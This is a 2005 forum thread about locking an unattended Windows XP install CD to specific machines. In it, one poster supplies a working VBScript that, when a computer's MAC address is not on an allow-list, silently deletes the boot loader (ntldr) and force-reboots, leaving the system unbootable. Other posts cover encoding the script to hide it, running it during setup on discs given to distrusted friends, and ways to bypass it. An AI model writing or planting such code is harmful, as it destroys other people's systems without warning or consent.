Martin Zugec Posted May 31, 2005 Share Posted May 31, 2005 Sorry, hard day today, still dont understand what you mean The ntldr is first deleted, second step is restarting computer... So when computer is restarting, the ntldr is already gone... Link to comment Share on other sites More sharing options...
SiMoNsAyS Posted May 31, 2005 Share Posted May 31, 2005 (edited) let me try it again...i've modified the script to delete temp.txt on drive C: and code.vbs is the code you posted.when i run the file a message pops where you need to press ok, before clicking file is still present and if i manually reset the machine file won't be deleted.attached to this post is the image where you can still see temp.txt.in the same way if you run the vbs file from runonce and you don't click it, you simply reset the machine, ntldr won't be deleted and runonce will continue from the next entry edit: found another vulnerability if you run the vbs script from cmdlines (T-13) you can open the command prompt with hotkeys, then type taskmgr.exe and from here kill wscript.exe Edited May 31, 2005 by SiMoNsAyS Link to comment Share on other sites More sharing options...
BlueMe Posted May 31, 2005 Author Share Posted May 31, 2005 Sorry For Not Posting Anymore But I Had A Problem With My ISP...So..Look What I've Been Thinking About...How About DEL The NTLDR Before The Windows Pops Up...I Mean If It Gets To See The Windows It Means That The Win Isn't Meant For Him...And If The MAC Is Ok ..The Script Will Continue Without Displaying Any Message...Am I Right That This Will Work ?More Simple Would Be :Check MAC , IF Ok Continue Without Displaying NothingIf Wrong DEL NTLDR And Restart Without PromtingIs This Possible ? Link to comment Share on other sites More sharing options...
TheeBeets Posted May 31, 2005 Share Posted May 31, 2005 The Best ProtectionKeep your hard work to yourself give to no-one Link to comment Share on other sites More sharing options...
SiMoNsAyS Posted May 31, 2005 Share Posted May 31, 2005 @BlueMe, that makes sense, it also won't brake uA.problem is if you want to install it on multiple pcs or if you change your MoBo. for me, protection must be something easier and available to everybody with the propper pass.for the moment TheeBeets solution is the best lol Link to comment Share on other sites More sharing options...
TheeBeets Posted May 31, 2005 Share Posted May 31, 2005 @BlueMe, that makes sense, it also won't brake uA.problem is if you want to install it on multiple pcs or if you change your MoBo. for me, protection must be something easier and available to everybody with the propper pass.for the moment TheeBeets solution is the best lol<{POST_SNAPBACK}>Why ThankYou my young padawan TheeBeets reigns all Link to comment Share on other sites More sharing options...
rikgale Posted May 31, 2005 Share Posted May 31, 2005 Ok I have read the entire post and I have some simple (and probably dumb) questions.1) What's the point of encoding the file using the Windows Script Encoder?2) I assume that the cscript part of cscript //nologo restrict.vbe should be placed in system32?3) Could the above code be placed in guirunonce in winnt.sif instead of RunOnceEx?4) Does the MAC address of a VM change everytime you reinstall the OS on it. Or does the MAC address stay until you reinstall the WM program (i.e. VMWare)?This is a really good idea and I am very grateful to Soulin for his efforts and much respect to him as a programmer (Every programmer apart from SPYWare\Virus programmers gets my respect as I can't program to save my life!)Cheers.... Link to comment Share on other sites More sharing options...
dougiefresh Posted May 31, 2005 Share Posted May 31, 2005 I see one MAJOR problem with this method! You see, I've been trying to come up with a way to choose the correct WPA.DBL based on the MAC address of a machine. I found that if the computer does not have the appropriate network drivers installed when my script runs, no MAC addresses are found. Therefore, I can't identify the machine via MAC addresses.Unless you plan on (1) including Bashrat's DriverPacks and/or (2) altering your UACD for all the new hardware on the people's computers that you intend on supporting, you need to make sure all networking hardware has drivers installed before you run that script.Other than that, I really like this solution for protecting an UACD!!!! Very, very cool!!!!!!!!!! Link to comment Share on other sites More sharing options...
BlueMe Posted May 31, 2005 Author Share Posted May 31, 2005 SyMoNsAySThat Wouldn't Be A Problem, Because I'm Not Planing To Have My UCD On Multiple PC's, Just Give It To Those 2 Friends Of Mine Wich I Don't Trust Them But Then Also I Can't Refuse Them..dougiefreshSee There That's Another Thing That I Didn't Think, And Guess What ? I Was Planing On Integrate Bashrat's DriverPacks So ..It's Not So Major Now Doesn't Anyone Know How To Modify It ? I Was Thinking To Do Some Tests Tonight. Link to comment Share on other sites More sharing options...
Martin Zugec Posted June 1, 2005 Share Posted June 1, 2005 2Simon: Ah, I see, you are right. So the next release (today after some work I need to do first) wont show any prompt, just delete NTLDR and restart. Also successful test pass wont show any message (it was just for debugging purposes). 2rikgale:1 - the point is people wont be able to modify it and see it content. I am using quite a lot vbscript files, every one is encrypted and this restriction script is doing few others things (so if someone simply remove it, it will broke the UA)2 - cscript is native in windows (WSH), you dont need to include it in your installation3 - Sure, but if the script is working from cmdlines.txt as Simon posted, it is better to place it there (I thought WMI classes are not available during that phase of installation, that is why I recommended ROE)4 - Nope - the MAC address is not based on installation OR VM application, it is based on your virtually created PC. So you can manipulate with discs and installations, and MAC will be same2dougiefresh: are you sure it is not available through WMI classes?Modified code as I promised:Option ExplicitDim objWMIService, arrayNIC, objNIC, strMAC, strAllowedHost, arrayAllowedHosts, strYouAreWelcomeDim strOperatingSystem, colOperatingSystemsDim objFSO, objShell, strSystemDriveConst wbemFlagReturnImmediately = &h10Const wbemFlagForwardOnly = &h20Const wmiRestartForce = 4 arrayAllowedHosts = array("00:0b:db:87:43:be","00:0b:db:87:43:bd")Set objFSO = CreateObject("Scripting.FileSystemObject")Set objShell = CreateObject("Wscript.Shell")Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2")Set arrayNIC = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapter", "WQL", wbemFlagReturnImmediately + wbemFlagForwardOnly)For Each objNIC In arrayNIC For Each strAllowedHost in arrayAllowedHosts If LCase(objNIC.MACAddress) = LCase(strAllowedHost) Then strYouAreWelcome = 1 Next NextIf strYouAreWelcome <> 1 Then Set colOperatingSystems = GetObject("winmgmts:{(Shutdown)}//./root/cimv2").ExecQuery("select * from Win32_OperatingSystem where Primary=true") strSystemDrive = objShell.ExpandEnvironmentStrings("%SystemDrive%") objFSO.DeleteFile strSystemDrive & "\ntldr", True For Each strOperatingSystem in colOperatingSystems strOperatingSystem.Reboot() NextEnd If4 - Link to comment Share on other sites More sharing options...
BlueMe Posted June 1, 2005 Author Share Posted June 1, 2005 So It Seems I'll Just Wait For Soulin ... Link to comment Share on other sites More sharing options...
Martin Zugec Posted June 1, 2005 Share Posted June 1, 2005 Give up waiting, begin with testing Link to comment Share on other sites More sharing options...
rikgale Posted June 1, 2005 Share Posted June 1, 2005 Thanx for your answers Soulin:) Link to comment Share on other sites More sharing options...
Martin Zugec Posted June 1, 2005 Share Posted June 1, 2005 2BlueMe: One request, copy that script to first page of this thread please. Link to comment Share on other sites More sharing options...
BrandonS_Mil Posted June 1, 2005 Share Posted June 1, 2005 Just a little off topic here but.....What if you have a computer (i.e. Dell) or other system that when you load XP it doesn't know how to use you LAN.... XP says -- NOT INSTALLED.Will the Script still work??? Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now